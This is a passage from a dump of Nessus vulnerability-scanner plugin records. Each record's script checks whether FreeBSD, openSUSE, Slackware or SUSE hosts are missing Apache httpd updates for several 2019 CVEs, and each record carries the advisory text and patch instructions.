script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.41\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:41:58", "description": "This update for apache2 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9517: Fixed HTTP/2 implementations that are vulnerable to unconstrained interal data buffering (bsc#1145575).\n\n - CVE-2019-10081: Fixed mod_http2 that is vulnerable to memory corruption on early pushes (bsc#1145742).\n\n - CVE-2019-10082: Fixed mod_http2 that is vulnerable to read-after-free in h2 connection shutdown (bsc#1145741).\n\n - CVE-2019-10092: Fixed limited cross-site scripting in mod_proxy (bsc#1145740).\n\n - CVE-2019-10097: Fixed mod_remoteip stack-based buffer overflow and NULL pointer dereference (bsc#1145739).\n\n - CVE-2019-10098: Fixed mod_rewrite configuration vulnerablility to open redirect (bsc#1145738).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-09-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-2019-2051) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2051.NASL", "href": "https://www.tenable.com/plugins/nessus/128460", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2051.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128460);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2019-9517\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2019-2051) (Internal Data Buffering)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for apache2 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9517: Fixed HTTP/2 implementations that are\n vulnerable to unconstrained interal data buffering\n (bsc#1145575).\n\n - CVE-2019-10081: Fixed mod_http2 that is vulnerable to\n memory corruption on early pushes (bsc#1145742).\n\n - CVE-2019-10082: Fixed mod_http2 that is vulnerable to\n read-after-free in h2 connection shutdown (bsc#1145741).\n\n - CVE-2019-10092: Fixed limited cross-site scripting in\n mod_proxy (bsc#1145740).\n\n - CVE-2019-10097: Fixed mod_remoteip stack-based buffer\n overflow and NULL pointer dereference (bsc#1145739).\n\n - CVE-2019-10098: Fixed mod_rewrite configuration\n vulnerablility to open redirect (bsc#1145738).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145575\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145740\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145741\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1145742\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected apache2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-debuginfo-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-debugsource-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-devel-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-event-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-event-debuginfo-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-example-pages-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-prefork-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-prefork-debuginfo-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-utils-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-utils-debuginfo-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-worker-2.4.33-lp151.8.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"apache2-worker-debuginfo-2.4.33-lp151.8.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:16:58", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "cvss3": {}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2020-091-02) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2020-091-02.NASL", "href": "https://www.tenable.com/plugins/nessus/135160", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2020-091-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135160);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2019-9517\"\n );\n script_xref(name:\"SSA\", value:\"2020-091-02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2020-091-02) (Internal Data Buffering)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2020&m=slackware-security.448035\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ce01bcfa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.43\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:50:09", "description": "This update for apache2 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9517: Fixed HTTP/2 implementations that are vulnerable to unconstrained interal data buffering (bsc#1145575).\n\nCVE-2019-10081: Fixed mod_http2 that is vulnerable to memory corruption on early pushes (bsc#1145742).\n\nCVE-2019-10082: Fixed mod_http2 that is vulnerable to read-after-free in h2 connection shutdown (bsc#1145741).\n\nCVE-2019-10092: Fixed limited cross-site scripting in mod_proxy (bsc#1145740).\n\nCVE-2019-10097: Fixed mod_remoteip stack-based buffer overflow and NULL pointer dereference (bsc#1145739).\n\nCVE-2019-10098: Fixed mod_rewrite configuration vulnerablility to open redirect (bsc#1145738).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-08-29T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : apache2 (SUSE-SU-2019:2237-1) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2", "p-cpe:/a:novell:suse_linux:apache2-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-debugsource", "p-cpe:/a:novell:suse_linux:apache2-devel", "p-cpe:/a:novell:suse_linux:apache2-event", "p-cpe:/a:novell:suse_linux:apache2-event-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-example-pages", "p-cpe:/a:novell:suse_linux:apache2-prefork", "p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-utils", "p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-worker", "p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-2237-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128316", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2237-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128316);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10092\",\n \"CVE-2019-10097\",\n \"CVE-2019-10098\",\n \"CVE-2019-9517\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : apache2 (SUSE-SU-2019:2237-1) (Internal Data Buffering)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for apache2 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9517: Fixed HTTP/2 implementations that are vulnerable to\nunconstrained interal data buffering (bsc#1145575).\n\nCVE-2019-10081: Fixed mod_http2 that is vulnerable to memory\ncorruption on early pushes (bsc#1145742).\n\nCVE-2019-10082: Fixed mod_http2 that is vulnerable to read-after-free\nin h2 connection shutdown (bsc#1145741).\n\nCVE-2019-10092: Fixed limited cross-site scripting in mod_proxy\n(bsc#1145740).\n\nCVE-2019-10097: Fixed mod_remoteip stack-based buffer overflow and\nNULL pointer dereference (bsc#1145739).\n\nCVE-2019-10098: Fixed mod_rewrite configuration vulnerablility to open\nredirect (bsc#1145738).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145575\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145740\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145741\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1145742\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-10081/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-10082/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-10092/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-10097/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-10098/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-9517/\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192237-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d21dafa\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Server-Applications-15-SP1-2019-2237=1\n\nSUSE Linux Enterprise Module for Server Applications 15:zypper in -t\npatch SUSE-SLE-Module-Server-Applications-15-2019-2237=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2237=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2237=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-debugsource-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-devel-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-event-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-event-debuginfo-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"apache2-example-pages-2.4.33-3.21.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", 